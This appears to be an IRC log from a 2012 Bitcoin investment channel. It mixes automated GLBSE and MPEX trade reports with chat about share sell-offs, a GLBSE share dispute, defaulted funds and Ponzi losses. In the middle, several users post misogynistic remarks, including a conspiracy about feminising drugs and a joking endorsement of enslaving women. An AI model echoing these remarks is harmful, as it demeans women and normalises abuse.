0.10531012 = 3.1593 BTC [-] Sep 23 15:47:34 [GLBSE] [ASICMINER] 20 @ 0.10531011 = 2.1062 BTC [-] Sep 23 15:47:35 [GLBSE] [ASICMINER] 20 @ 0.10531011 = 2.1062 BTC [-] Sep 23 15:47:36 [GLBSE] [ASICMINER] 5 @ 0.10531002 = 0.5266 BTC [-] Sep 23 15:47:37 [GLBSE] [ASICMINER] 200 @ 0.10531001 = 21.062 BTC [-] Sep 23 15:47:38 [GLBSE] [ASICMINER] 200 @ 0.100001 = 20.0002 BTC [-] Sep 23 15:47:39 [GLBSE] [ASICMINER] 50 @ 0.10000001 = 5 BTC [-] Sep 23 15:47:40 [GLBSE] [ASICMINER] 25 @ 0.10000001 = 2.5 BTC [-] Sep 23 15:47:41 [GLBSE] [ASICMINER] 1000 @ 0.1 = 100 BTC [-] Sep 23 15:47:49 oh my Sep 23 15:48:01 WOW Sep 23 15:48:05 that was a hug dump Sep 23 15:48:06 hack? Sep 23 15:48:13 someone needed some BTC Sep 23 15:48:52 fuck I should have had a bid up... Sep 23 15:49:25 it always drops^^ Sep 23 15:49:33 though with the recent good news it will go up again soon Sep 23 15:50:47 !ticker Sep 23 15:50:47 Provide ticker. Sep 23 15:51:47 ;;ticker Sep 23 15:51:48 Best bid: 11.79052, Best ask: 11.81, Bid-ask spread: 0.01948, Last trade: 11.8, 24 hour volume: 32140, 24 hour low: 11.6304, 24 hour high: 12.2811 Sep 23 15:59:47 haha lol xD Sep 23 15:59:48 nice :D Sep 23 16:05:40 this whole Goat situation and the GLBSE shares makes me feel old xD Sep 23 16:05:55 It was so long ago and almost noone that's currently in the lending community was there Sep 23 16:06:07 who cares about goat anyways Sep 23 16:06:10 hes just a troll Sep 23 16:09:11 I just feel like Nef is getting a lot of shit recently Sep 23 16:09:23 is Goat here? Sep 23 16:10:11 DeaDTerra: well, being drama king of the hour isnt helping him Sep 23 16:10:31 nope don't think so he would probably be screaming at me if that was the case xD Sep 23 16:11:05 lets try a goat summoning spell Sep 23 16:11:08 hahah xD Sep 23 16:11:34 usagi: what, seriously? Sep 23 16:11:35 Anyways, I am going to go back to my studies brb Sep 23 16:11:37 hes actually doing that? Sep 23 16:11:40 I thought he was trolling Sep 23 16:12:07 [MPEX] [S.MPOE] 38300 @ 0.00041662 = 15.9565 BTC [-] Sep 23 16:12:07 usagi: you keep telling people you're a japanese pricness Sep 23 16:12:29 japan only has one princess, and unless she happens to be far more elegant than she looks, I would not hit that. Sep 23 16:13:10 you know what I want to know? Sep 23 16:13:16 when did women stop being elegant Sep 23 16:13:55 I already know most of the story Sep 23 16:14:29 its when we started putting drugs in the water to feminise men to prevent an uprising Sep 23 16:14:47 it also caused women to never progress mentally farther than mere girls Sep 23 16:16:23 maybe we need some sort of women education centers Sep 23 16:16:56 it can crank out women who will happily join society instead of ruin it Sep 23 16:17:18 just because you can pop out children doesnt mean you should. Sep 23 16:18:41 seriously Sep 23 16:18:54 how many 30 and 40 year old "women" wear everything pink Sep 23 16:19:03 or have their tits enlarged Sep 23 16:19:17 or put fruity colors in their hair Sep 23 16:19:28 or wear outlandish clothing Sep 23 16:21:07 or expect their man to do everything Sep 23 16:21:15 I think thats the worst offense of them all Sep 23 16:22:47 usagi: and when the hell did people stop having meaningful conversations Sep 23 16:32:14 wgy? Sep 23 16:36:00 why? Sep 23 16:36:24 Diablo-D3 it's called slavery. whips and chains. it works wonders. Sep 23 16:36:55 makes elegant and centered women. that's your education center. Sep 23 16:36:59 [GLBSE] [CPA] 1 @ 0.05 BTC [-] Sep 23 16:37:46 [GLBSE] [MOVETO.FUND] 5 @ 0.85 = 4.25 BTC [-] Sep 23 16:37:48 [GLBSE] [MOVETO.FUND] 5 @ 0.83 = 4.15 BTC [-] Sep 23 16:37:55 [GLBSE] [CPA] 10 @ 0.06999 = 0.6999 BTC [+] Sep 23 16:38:19 [GLBSE] [CPA] 9 @ 0.05 = 0.45 BTC [-] Sep 23 16:38:21 [GLBSE] [CPA] 1 @ 0.04302 BTC [-] Sep 23 16:38:24 mircea_popescu: no, that makes for stupid women Sep 23 16:38:40 nah. Sep 23 16:39:10 yes, look at what passes for "hot" now adays Sep 23 16:39:21 high school dropouts that just pop out children to 5 different men Sep 23 16:39:21 has nothing to do with that tho. Sep 23 16:39:23 you guys talking about ur mams? lol Sep 23 16:39:36 Lucidize no yours Sep 23 16:39:58 lol too funny, u sound like small kids =) Sep 23 16:40:08 [MPEX] [F.GIGA.ETF] 3425 @ 0.00027718 = 0.9493 BTC [-] Sep 23 16:40:09 [MPEX] [F.GIGA.ETF] 6200 @ 0.00027711 = 1.7181 BTC [-] Sep 23 16:40:09 no u Sep 23 16:40:11 [MPEX] [F.GIGA.ETF] 5175 @ 0.00027681 = 1.4325 BTC [-] Sep 23 16:40:12 [GLBSE] [ASICMINER] 2 @ 0.1099 = 0.2198 BTC [+] Sep 23 16:40:13 [MPEX] [S.MPOE] 9584 @ 0.00041662 = 3.9929 BTC [-] Sep 23 16:40:14 [MPEX] [S.MPOE] 6516 @ 0.00041644 = 2.7135 BTC [-] Sep 23 16:40:33 just turning the mirror round to u Sep 23 16:40:42 i turned it first! Sep 23 16:40:45 so disrespectful to women Sep 23 16:40:51 [GLBSE] [CPA] 1 @ 0.02153 BTC [-] Sep 23 16:41:05 glup. Sep 23 16:41:45 well Sep 23 16:41:53 my bids got eaten over night Sep 23 16:41:59 ;> Sep 23 16:42:32 Lucidize what's that even mean, "disrespectful to women" Sep 23 16:43:19 don't you have a dictionary? look it up Sep 23 16:43:53 it doesn't matter, i don't usually converse with bottom feeders Sep 23 16:44:09 .ud disrespectful to women Sep 23 16:44:53 do i have to correct myself, u can't see what that is supposed to say? lol Sep 23 16:45:02 out to lunch have fun =) Sep 23 16:45:08 [GLBSE] [ASICMINER] 8 @ 0.1099 = 0.8792 BTC [+] Sep 23 16:45:20 i just think it's the sort of non-concept the intellectually lazy hide behind Sep 23 16:45:21 that is all. Sep 23 16:46:17 correct, im lazy =) Sep 23 16:46:24 hence the typos Sep 23 16:47:10 women are just a gender. you can't respect the color pink, the edge of a cube or "women". Sep 23 16:47:47 I see what you are saying, but generalizing is also poor form Sep 23 16:48:07 this is true. Sep 23 16:48:55 [GLBSE] [ASICMINER] 25 @ 0.1099 = 2.7475 BTC [+] Sep 23 16:48:57 [GLBSE] [ASICMINER] 125 @ 0.11 = 13.75 BTC [+] Sep 23 16:49:04 anywayreally gotta go, i wasn't trolling - just caught a sentence from diablo that annoyed me and wanted to make a short comment =) Sep 23 16:50:14 [GLBSE] [ASICMINER] 16 @ 0.11 = 1.76 BTC [+] Sep 23 16:59:50 [GLBSE] [ASICMINER] 2 @ 0.11 = 0.22 BTC [+] Sep 23 17:01:15 [GLBSE] [FPGAMINING] 1 @ 0.37890052 BTC [-] Sep 23 17:01:17 [GLBSE] [FPGAMINING] 10 @ 0.37890052 = 3.789 BTC [-] Sep 23 17:01:34 [GLBSE] [DMC] 9 @ 0.06 = 0.54 BTC [-] Sep 23 17:01:34 [GLBSE] [DMC] 7 @ 0.0605 = 0.4235 BTC [+] Sep 23 17:02:17 [GLBSE] [FPGAMINING] 3 @ 0.37890052 = 1.1367 BTC [-] Sep 23 17:03:30 [GLBSE] [NASTY] 1 @ 0.5097 BTC [+] Sep 23 17:10:09 [MPEX] [S.MPOE] 26679 @ 0.00041717 = 11.1297 BTC [+] Sep 23 17:10:09 [MPEX] [S.MPOE] 16000 @ 0.00041763 = 6.6821 BTC [+] Sep 23 17:16:18 In about 6 hours from now, FDBF is paying its weekly dividends! Sep 23 17:16:38 [GLBSE] [PUREMINING] 3 @ 0.108495 = 0.3255 BTC [+] Sep 23 17:23:58 no moonlanding. Sep 23 17:25:27 hm do we have self conscious bot on glbse? Sep 23 17:26:03 Yes, very self-conscious bots. They keep worrying about their appearance. Sep 23 17:34:36 [GLBSE] [FPGA.CONTRACT] 1 @ 0.072499 BTC [-] Sep 23 17:34:39 Well I need something to spend money on. Got 280 BTC laying around and looking for some deals. Sep 23 17:35:03 so get a mpoe bond Sep 23 17:37:22 Seeing last dividend... I'd say 0.15 BTC Sep 23 17:37:24 [MPEX] [F.GIGA.ETF] 1856 @ 0.00027681 = 0.5138 BTC [-] Sep 23 17:37:25 [MPEX] [F.GIGA.ETF] 5744 @ 0.00027619 = 1.5864 BTC [-] Sep 23 17:37:37 So I guess I can't currently purchase. Sep 23 17:38:12 I should probably read actual income statements Sep 23 17:39:37 mircea_popescu: yes I was looking at the passthroughs Sep 23 17:39:53 passthroughs ? Sep 23 17:44:20 [GLBSE] [FUTUREFUND] 220 @ 0.00012935 = 0.0285 BTC [-] Sep 23 17:52:01 [GLBSE] [FPGAMINING] 7 @ 0.3759001 = 2.6313 BTC [-] Sep 23 17:54:14 BFL will ship your mini rig in 2013 (april earliest) and if you order now you will be at the bottom of the list Sep 23 17:54:21 I will get mine first Sep 23 17:54:52 [GLBSE] [GIGAMINING] 1 @ 0.64030001 BTC [-] Sep 23 17:54:54 [GLBSE] [GIGAMINING] 2 @ 0.6403 = 1.2806 BTC [-] Sep 23 17:54:55 [GLBSE] [GIGAMINING] 4 @ 0.64020001 = 2.5608 BTC [-] Sep 23 17:54:56 [GLBSE] [GIGAMINING] 1 @ 0.6402 BTC [-] Sep 23 17:54:58 [GLBSE] [GIGAMINING] 21 @ 0.64 = 13.44 BTC [-] Sep 23 17:55:01 + 30K is a lot and might not ever be repayd by mining with it Sep 23 17:56:01 passthroughs ? Sep 23 17:56:29 yes, passthrough. The MPOE.ETF on GLBSE Sep 23 17:56:50 [GLBSE] [GIGAMINING] 2 @ 0.63100001 = 1.262 BTC [-] Sep 23 17:56:52 [GLBSE] [GIGAMINING] 19 @ 0.631 = 11.989 BTC [-] Sep 23 17:57:20 o. i meant mpoe bonds. they have the advantage you set your own interest. Sep 23 17:57:40 Weird Sep 23 17:58:35 I'll take ∞% interest then =P Sep 23 17:59:46 [GLBSE] [GIGAMINING] 1 @ 0.63999999 BTC [+] Sep 23 17:59:47 http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 see there how they work. Sep 23 18:03:15 [MPEX] [F.GIGA.ETF] 3156 @ 0.00027619 = 0.8717 BTC [-] Sep 23 18:03:16 [MPEX] [F.GIGA.ETF] 659 @ 0.00027585 = 0.1818 BTC [-] Sep 23 18:03:19 [MPEX] [F.GIGA.ETF] 1900 @ 0.00027584 = 0.5241 BTC [-] Sep 23 18:03:20 [MPEX] [F.GIGA.ETF] 2900 @ 0.0002758 = 0.7998 BTC [-] Sep 23 18:03:22 [MPEX] [F.GIGA.ETF] 3885 @ 0.00027566 = 1.0709 BTC [-] Sep 23 18:03:23 [MPEX] [S.MPOE] 6203 @ 0.00042 = 2.6053 BTC [+] Sep 23 18:04:09 [MPEX] [F.GIGA.ETF] 14100 @ 0.00029352 = 4.1386 BTC [+] Sep 23 18:04:47 [GLBSE] [GIGAMINING] 1 @ 0.67567998 BTC [+] Sep 23 18:07:23 [MPEX] [S.BVPS] 665 @ 0.00292755 = 1.9468 BTC [+] Sep 23 18:07:35 [GLBSE] [PUREMINING] 2 @ 0.108495 = 0.217 BTC [+] Sep 23 18:09:23 [GLBSE] [GSDPT] 1000 @ 0.0034 = 3.4 BTC [-] Sep 23 18:10:08 [MPEX] [S.DICE] 51176 @ 0.0034 = 173.9984 BTC [+] Sep 23 18:10:19 More S.DICE shares has been bought for GSDPT backing :) Sep 23 18:10:51 how much you hold by now, half a mil ? Sep 23 18:10:53 [GLBSE] [BIF-AG-INDEX] 1 @ 0.17 BTC [-] Sep 23 18:12:07 [MPEX] [S.DICE] 1000 @ 0.0034 = 3.4 BTC [+] Sep 23 18:17:00 [GLBSE] [TICKER] 290 @ 0.35 = 101.5 BTC [-] Sep 23 18:25:18 [GLBSE] [ASICMINER] 35 @ 0.11 = 3.85 BTC [+] Sep 23 18:25:21 "TCThe china's largest and earliest bitcoin website information portal http://www.hxtop.com as hackers through sql injection bug get the control of the virtual host(windows2003 system) hxtop.com unable to access normally now." Sep 23 18:25:22 lmao Sep 23 18:26:07 [GLBSE] [ASICMINER] 47 @ 0.11 = 5.17 BTC [+] Sep 23 18:26:30 [GLBSE] [ASICMINER] 52 @ 0.11 = 5.72 BTC [+] Sep 23 18:27:52 [GLBSE] [ASICMINER] 17 @ 0.11 = 1.87 BTC [+] Sep 23 18:28:51 [GLBSE] [ASICMINER] 100 @ 0.11 = 11 BTC [+] Sep 23 18:29:27 [GLBSE] [ASICMINER] 20 @ 0.11 = 2.2 BTC [+] Sep 23 18:31:18 500,000 shares of GSDPT has been issued :) Sep 23 18:31:30 so 5% of the total amount Sep 23 18:32:00 or 0.5% of the total shares of SD... Sep 23 18:37:35 [GLBSE] [BTC-BOND] 200 @ 0.00995 = 1.99 BTC [-] Sep 23 18:38:09 [MPEX] [S.MPOE] 17258 @ 0.00042 = 7.2484 BTC [+] Sep 23 18:40:25 what's their income look like this month ? Sep 23 18:40:40 there was a guy who kept track of it independently but i dun recall who now Sep 23 18:40:46 [GLBSE] [ASICMINER] 25 @ 0.109999 = 2.75 BTC [-] Sep 23 18:41:12 OBSI.HRPT sure is going down Sep 23 18:42:03 ASICMINER too Sep 23 18:42:03 yeah. Sep 23 18:42:25 [GLBSE] [GSDPT] 33 @ 0.0034 = 0.1122 BTC [-] Sep 23 18:44:11 [GLBSE] [BLUECHIP] 5 @ 0.1 = 0.5 BTC [+] Sep 23 18:45:01 [GLBSE] [BLUECHIP] 2 @ 0.1 = 0.2 BTC [+] Sep 23 18:45:26 [GLBSE] [OBSI.HRPT] 2 @ 0.071006 = 0.142 BTC [-] Sep 23 18:47:32 [GLBSE] [ASICMINER] 1 @ 0.1098 BTC [-] Sep 23 18:47:52 requirement met Sep 23 18:48:09 You already have 100 BTC Sep 23 18:48:28 OOOOHHH, right... Sep 23 18:49:14 Is that good bargaining? Sep 23 18:49:41 What kind of software? Sep 23 18:49:55 [GLBSE] [OBSI.HRPT] 2 @ 0.071003 = 0.142 BTC [-] Sep 23 18:50:27 Oh, the adobe suit Sep 23 18:51:14 >.> Sep 23 18:51:22 Let me guess, pirated? Sep 23 18:51:51 Then why do you have it in chinese? Can't you just get the english installer? Sep 23 18:52:07 [GLBSE] [ASICMINER] 1 @ 0.1098 BTC [-] Sep 23 18:52:23 I thought you were in Canada Sep 23 18:52:45 I'm pretty sure you said so... Sep 23 18:52:48 [GLBSE] [OBSI.HRPT] 1 @ 0.071 BTC [-] Sep 23 18:52:51 Multiple times... Sep 23 18:53:23 Plus your domain name is canadian Sep 23 18:55:08 yeah Sep 23 18:55:17 I'll sell all his info for a burrito Sep 23 18:55:26 Yeah, but you told me you were in Canada, I'm 99.99% sure of that. Plus .ca domains are for canadian business/residents only. Sep 23 18:55:27 does anyone have a breakfast burrito? Sep 23 18:55:45 lol Sep 23 18:55:52 just for the record Sep 23 18:55:55 that was a joke Sep 23 18:56:06 incase anyone wants to take me out of context Sep 23 18:56:10 I think everyone knew Sep 23 18:56:22 But yes, misquoting seems common around these parts Sep 23 18:56:26 OMG !!! NEFARIO IS SELLING USERS INFO FOR A BURRITO!!! Sep 23 18:56:30 [GLBSE] [FPGA.CONTRACT] 2 @ 0.0615 = 0.123 BTC [-] Sep 23 18:56:35 would be funny headlines Sep 23 18:56:46 lol Sep 23 18:57:10 "USE MY EXCHANGE, NEFARIO WILL SELL YOUR IDENTITY FOR A BURRITO" Sep 23 18:57:21 and then every time Im on irc Sep 23 18:57:24 he'll be like Sep 23 18:57:48 DID YOU OR DID YOU NOT SAY YOU WOULD SELL USERS INFO FOR A BREAKFAST BURRITO?!!! Sep 23 18:58:02 [GLBSE] [ASICMINER] 2 @ 0.1098 = 0.2196 BTC [-] Sep 23 18:58:05 and I would try to explain about the context and sarcasm Sep 23 18:58:10 and he would start shouting Sep 23 18:58:16 ANSWER THE QUESTION!!! Sep 23 18:58:25 YOU CANT HANDLE THE TRUTH!!!! Sep 23 18:58:33 YOU HAD ME AT HELLO Sep 23 18:58:51 ha Sep 23 18:58:51 whats going on in drama land now? :) Sep 23 18:59:07 no Im doing a mircea impression Sep 23 19:00:35 https://bitcointalk.org/index.php?topic=112071.msg1214385#msg1214385 Sep 23 19:00:36 usagi: lol did you just use military terminology Sep 23 19:00:56 ARE YOU TRYING FOR A SECTION 8 Sep 23 19:00:58 I believe he is using a full metal jacket reference Sep 23 19:01:09 hey cowboy Sep 23 19:01:16 I think leanards a section 8 Sep 23 19:01:27 or however you spell the name Sep 23 19:01:28 lol Sep 23 19:01:34 such a good moive Sep 23 19:01:41 >writes down Sep 23 19:02:29 https://bitcointalk.org/index.php?topic=112228.0 Sep 23 19:02:37 I tried to warn a friend in Argentina about this Sep 23 19:02:42 She had a chance Sep 23 19:02:44 but nooooo Sep 23 19:02:48 she didn't listen Sep 23 19:02:55 Everyone Sep 23 19:02:55 now she's stuck with worthless pesos Sep 23 19:03:07 read this on the goat/GLBSE share saga Sep 23 19:03:08 https://bitcointalk.org/index.php?topic=112071.msg1214385#msg1214385 Sep 23 19:03:23 Just did, bro. Sep 23 19:03:39 [MPEX] [F.GIGA.ETF] 5786 @ 0.00027566 = 1.595 BTC [-] Sep 23 19:03:40 [MPEX] [F.GIGA.ETF] 1400 @ 0.00027504 = 0.3851 BTC [-] Sep 23 19:03:41 [MPEX] [F.GIGA.ETF] 6700 @ 0.00027469 = 1.8404 BTC [-] Sep 23 19:03:42 [MPEX] [S.MPOE] 4000 @ 0.00042 = 1.68 BTC [+] Sep 23 19:04:17 [GLBSE] [ASICMINER] 7 @ 0.1098 = 0.7686 BTC [-] Sep 23 19:04:20 that seems fair and reasonable right? Sep 23 19:04:31 Indeed. Sep 23 19:04:41 doesn't mean goat will accept Sep 23 19:04:43 but hey Sep 23 19:04:54 I think if the shareholders go for it Sep 23 19:04:56 and Sep 23 19:05:04 he wants to hold onto those shares Sep 23 19:05:04 then Sep 23 19:05:12 he is going to have to buy back the ones he sold Sep 23 19:05:18 at the price he paid Sep 23 19:05:43 How many GLBSE shares are there in total? That might be classified but I am interested. Sep 23 19:05:49 [GLBSE] [ASICMINER] 49 @ 0.1098 = 5.3802 BTC [-] Sep 23 19:05:51 [GLBSE] [ASICMINER] 45 @ 0.11 = 4.95 BTC [+] Sep 23 19:06:15 about 70K Sep 23 19:06:34 lol Sep 23 19:06:42 and we're fighting about 80 shares Sep 23 19:07:43 yeah Sep 23 19:07:50 it's not about the BTC involved Sep 23 19:08:03 it's just the restrictions that are there because of the rules Sep 23 19:08:10 which I have to follow Sep 23 19:09:55 https://bitcointalk.org/index.php?topic=77469.msg1213445#msg1213445 Diablo-D3 so did you get dmc back ? Sep 23 19:12:42 this channel needs a new command to deal with all the drama !Botcorn munch! munch! munch! Sep 23 19:13:19 [GLBSE] [ASICMINER] 41 @ 0.11 = 4.51 BTC [+] Sep 23 19:13:20 [GLBSE] [ASICMINER] 10 @ 0.11219898 = 1.122 BTC [+] Sep 23 19:13:21 [GLBSE] [ASICMINER] 249 @ 0.115 = 28.635 BTC [+] Sep 23 19:14:09 [GLBSE] [COGNITIVE] 1 @ 0.56 BTC [-] Sep 23 19:14:10 [GLBSE] [COGNITIVE] 1 @ 0.5599 BTC [-] Sep 23 19:15:24 [GLBSE] [ASICMINER] 10 @ 0.115 = 1.15 BTC [+] Sep 23 19:16:03 [GLBSE] [YABMC] 21 @ 0.08285008 = 1.7399 BTC [-] Sep 23 19:16:08 Everybody buy... ASICMINER Sep 23 19:17:24 lol Sep 23 19:17:58 I thought they'd drop more =/ Sep 23 19:18:01 [GLBSE] [ASICMINER] 17 @ 0.114999 = 1.955 BTC [-] Sep 23 19:18:02 [GLBSE] [ASICMINER] 27 @ 0.115 = 3.105 BTC [+] Sep 23 19:19:04 Looking for a 3btc loan to roll dice. Truth. Sep 23 19:19:07 lmao Sep 23 19:20:06 Yeah... I think I'll loan to myself and just roll if I was interested in such a risky investment Sep 23 19:20:33 [GLBSE] [FPGA.CONTRACT] 2 @ 0.0611001 = 0.1222 BTC [-] Sep 23 19:21:31 [GLBSE] [ASICMINER] 1 @ 0.11499 BTC [-] Sep 23 19:22:02 [GLBSE] [ASICMINER] 124 @ 0.11499 = 14.2588 BTC [-] Sep 23 19:22:04 [GLBSE] [ASICMINER] 90 @ 0.115 = 10.35 BTC [+] Sep 23 19:22:39 [GLBSE] [ASICMINER] 124 @ 0.115 = 14.26 BTC [+] Sep 23 19:22:54 i think that may be better than average in terms of risk. Sep 23 19:23:41 ... true Sep 23 19:23:53 So the advice here is... don't loan Sep 23 19:23:59 Except to yourself Sep 23 19:29:13 hmm, who runs bets of bitcoin ? Sep 23 19:29:21 no idea Sep 23 19:30:39 http://www.youtube.com/watch?feature=player_embedded&v=2rCP4CRRO7E Sep 23 19:31:18 [MPEX] [S.MPOE] 5229 @ 0.00041856 = 2.1887 BTC [-] Sep 23 19:31:19 [MPEX] [S.MPOE] 7371 @ 0.00041644 = 3.0696 BTC [-] Sep 23 19:33:39 [GLBSE] [YABMC] 1 @ 0.08994999 BTC [+] Sep 23 19:34:10 !ticker YABMC Sep 23 19:34:13 [GLBSE:YABMC] [Bid: 0.08215] [Ask: 0.08994999] [Spread: 0.00779999] [Last: 0.08994999] [24hVol: 4.91270168] [7dAvg: 0.08392129] Sep 23 19:34:22 Bane_Capital: video is awesomesauce Sep 23 19:36:21 [GLBSE] [COGNITIVE] 1 @ 0.5599 BTC [-] Sep 23 19:36:23 [GLBSE] [COGNITIVE] 1 @ 0.5546 BTC [-] Sep 23 19:36:23 [GLBSE] [COGNITIVE] 1 @ 0.5543 BTC [-] Sep 23 19:36:24 [GLBSE] [COGNITIVE] 4 @ 0.5543 = 2.2172 BTC [-] Sep 23 19:39:51 lol Sep 23 19:44:38 so Sep 23 19:44:48 just to get some value from my 1 wee k travel card Sep 23 19:45:00 Im going to ride the tube for a couple of hours Sep 23 19:45:07 just switching trains and reading a book Sep 23 19:45:09 later Sep 23 19:47:02 being homeless must suck. Sep 23 19:47:55 [GLBSE] [PUREMINING] 5 @ 0.108495 = 0.5425 BTC [+] Sep 23 19:48:07 [GLBSE] [GIGAMINING] 4 @ 0.673 = 2.692 BTC [-] Sep 23 19:48:09 Nah, just wasting time in a train is great to relax. It's better when it's not a "tube" train tho Sep 23 19:49:02 Surface trains = less stops and better scenery. Usually smoother ride too. Sep 23 19:49:23 [GLBSE] [PUREMINING] 1 @ 0.1084999 BTC [+] Sep 23 19:50:16 [GLBSE] [BIB.BVPS] 118 @ 0.0044 = 0.5192 BTC [+] Sep 23 19:50:59 [GLBSE] [PUREMINING] 1 @ 0.1085 BTC [+] Sep 23 19:51:58 [GLBSE] [PUREMINING] 7 @ 0.1087 = 0.7609 BTC [+] Sep 23 19:52:52 [GLBSE] [PUREMINING] 1 @ 0.1088 BTC [+] Sep 23 19:53:37 [GLBSE] [PUREMINING] 15 @ 0.1091 = 1.6365 BTC [+] Sep 23 19:54:46 [GLBSE] [BFLS] 86 @ 0.5462 = 46.9732 BTC [-] Sep 23 19:59:10 [MPEX] [F.GIGA.ETF] 2300 @ 0.00027429 = 0.6309 BTC [-] Sep 23 19:59:11 [MPEX] [F.GIGA.ETF] 1500 @ 0.00027411 = 0.4112 BTC [-] Sep 23 20:02:10 anyone here keeps a paper backup of their bitcoin private keys? Sep 23 20:08:03 [GLBSE] [CPA] 3 @ 0.04 = 0.12 BTC [+] Sep 23 20:13:49 nefario: can you comment on offering to sell users information for a breakfast burrito? Sep 23 20:13:52 :-D Sep 23 20:14:06 is there a thread on that? Sep 23 20:14:13 nah just read the buffer Sep 23 20:14:15 [GLBSE] [FPGAMINING] 2 @ 0.37840038 = 0.7568 BTC [+] Sep 23 20:14:47 lol Sep 23 20:15:34 haha xD Sep 23 20:15:51 btw have you decided on what is needed by the asset to reach the different levels of the market? Sep 23 20:15:56 white,blue,pink etc? Sep 23 20:16:16 breakfast burrito? Sep 23 20:16:24 haha Sep 23 20:16:44 just to clarify it was a joke teek Sep 23 20:17:03 breakfast burritos are not a joking matter Sep 23 20:17:08 :P Sep 23 20:17:12 to taco bell! Sep 23 20:23:47 [GLBSE] [RSM] 4 @ 0.3 = 1.2 BTC [+] Sep 23 20:25:09 [MPEX] [F.GIGA.ETF] 15300 @ 0.00027411 = 4.1939 BTC [-] Sep 23 20:25:10 [MPEX] [F.GIGA.ETF] 3143 @ 0.00027402 = 0.8612 BTC [-] Sep 23 20:25:12 [MPEX] [S.MPOE] 2822 @ 0.00041644 = 1.1752 BTC [-] Sep 23 20:26:15 [GLBSE] [CPA] 1 @ 0.03000001 BTC [-] Sep 23 20:27:49 [GLBSE] [GSDPT] 9 @ 0.00339999 = 0.0306 BTC [-] Sep 23 20:35:47 [GLBSE] [OBSI.HRPT] 1 @ 0.079 BTC [+] Sep 23 20:52:10 [MPEX] [F.GIGA.ETF] 4340 @ 0.00027402 = 1.1892 BTC [-] Sep 23 20:53:42 [GLBSE] [GIGAMINING] 5 @ 0.63469996 = 3.1735 BTC [-] Sep 23 21:02:55 [GLBSE] [GIGAMINING] 1 @ 0.66899999 BTC [+] Sep 23 21:12:39 [GLBSE] [GIGAMINING] 2 @ 0.66500001 = 1.33 BTC [-] Sep 23 21:12:59 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 23 21:13:28 CPA [1@1BTC] paid: 0.00569688 BTC. Last price: 0.03000001 BTC. Capital gain: -0.96999999 BTC. Total: -0.96430311 BTC. (-96.4%) Sep 23 21:13:51 https://bitcointalk.org/index.php?topic=112038.0 if anyone needs a laugh. Sep 23 21:14:23 its 0.1 afaik? Sep 23 21:14:29 !pl cpa 0.1 Sep 23 21:14:29 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 23 21:15:02 CPA [1@0.1BTC] paid: 0.00569688 BTC. Last price: 0.03000001 BTC. Capital gain: -0.06999999 BTC. Total: -0.06430311 BTC. (-64.3%) Sep 23 21:17:02 [GLBSE] [GSDPT] 2 @ 0.00337 = 0.0067 BTC [-] Sep 23 21:17:03 [GLBSE] [GSDPT] 999 @ 0.00336 = 3.3566 BTC [-] Sep 23 21:17:05 [GLBSE] [GSDPT] 20 @ 0.003351 = 0.067 BTC [-] Sep 23 21:17:06 [GLBSE] [GSDPT] 500 @ 0.00335 = 1.675 BTC [-] Sep 23 21:17:07 [GLBSE] [GSDPT] 5 @ 0.003301 = 0.0165 BTC [-] Sep 23 21:17:08 [GLBSE] [GSDPT] 500 @ 0.0033 = 1.65 BTC [-] Sep 23 21:17:09 [GLBSE] [GSDPT] 400 @ 0.00321 = 1.284 BTC [-] Sep 23 21:17:10 [GLBSE] [GSDPT] 574 @ 0.0032 = 1.8368 BTC [-] Sep 23 21:21:08 [GLBSE] [GIGAMINING] 2 @ 0.66500001 = 1.33 BTC [-] Sep 23 21:22:05 [GLBSE] [BITCOINMINV] 200 @ 0.11 = 22 BTC [-] Sep 23 21:22:33 CPA had money around in "safe deposits" like HaskKing's and numerous others Sep 23 21:23:10 [MPEX] [F.GIGA.ETF] 2600 @ 0.00027402 = 0.7125 BTC [-] Sep 23 21:24:08 So yeah, guess what? Everyone gladly took CPA's deposit for non-pirate stuff... and then when pirate defaults... oops... Sep 23 21:24:39 "But I thought Pirate was safe!" Sep 23 21:24:43 ARRR Sep 23 21:25:22 Well many weren't 100% in pirate... Sep 23 21:25:29 but it still caused lots of problems Sep 23 21:32:29 Yes, what I'm saying. Stupid people collecting money on lies to put in ponzis Sep 23 21:34:11 see the forum link above about the "hyip investment fund" Sep 23 21:36:11 man Sep 23 21:36:15 Im going to start an investment fund Sep 23 21:36:26 "diablo blows it on hookers high yield investment fund" Sep 23 21:37:35 thought you already did that. Sep 23 21:37:52 no, thats more nefario's kind of thing Sep 23 21:39:35 last week? Was posted yesterday. Sep 23 21:39:54 Y u no share time machine usagi? Sep 23 21:42:40 Hand out the account csv and let people run it in their custom tools. Sep 23 21:43:01 [GLBSE] [GIGAMINING] 1 @ 0.66500001 BTC [-] Sep 23 21:43:21 CPA's portfolio Sep 23 21:44:08 I guess maybe all of them, CPA/NYAN/BMF? Sep 23 21:47:02 EskimoBob, yeah, I'm kind of pushing Nefario a bit for funds/portfolio managers to have the option to make the account holdings public at any time directly from GLBSE Sep 23 21:48:10 [GLBSE] [FPGAMINING] 1 @ 0.43859981 BTC [+] Sep 23 21:49:10 [MPEX] [S.MPOE] 36491 @ 0.00041644 = 15.1963 BTC [-] Sep 23 21:49:11 [GLBSE] [FPGAMINING] 1 @ 0.43859982 BTC [+] Sep 23 21:49:12 [MPEX] [S.MPOE] 8209 @ 0.00041628 = 3.4172 BTC [-] Sep 23 21:49:14 [GLBSE] [FPGAMINING] 4 @ 0.43859982 = 1.7544 BTC [+] Sep 23 21:49:53 [GLBSE] [FPGAMINING] 1 @ 0.43859982 BTC [+] Sep 23 21:50:57 [GLBSE] [FPGAMINING] 12 @ 0.48299999 = 5.796 BTC [+] Sep 23 21:51:45 ./Sup usagi Sep 23 21:51:50 Without ./ :D Sep 23 21:52:00 Seriously... not ONE, SINGLE attack lines of the "moron/retard/troll" is even worth answering, ever. Especially by more "moron/retard/troll" statements. Stay classy my friends. Sep 23 21:52:46 BTC-Mining party pooper. Sep 23 21:53:13 It's his term for anything that loses a large % of initial IPO price. EskimoBog tags them as financial turds. Sep 23 21:53:40 He was asking if CPA was turning into one. Sep 23 21:55:02 mircea_popescu: Good call... Sep 23 21:55:20 I shouldn't interupt the pary like that. Sep 23 21:55:45 BTC-Mining if it's a party you're the only one in it not on my ignore, so... Sep 23 21:55:48 i'm missing out. Sep 23 21:56:16 Oh... how sad, mircea Sep 23 21:58:07 i just looked, 350+ lines ignored this session alone. i am a happy man. Sep 23 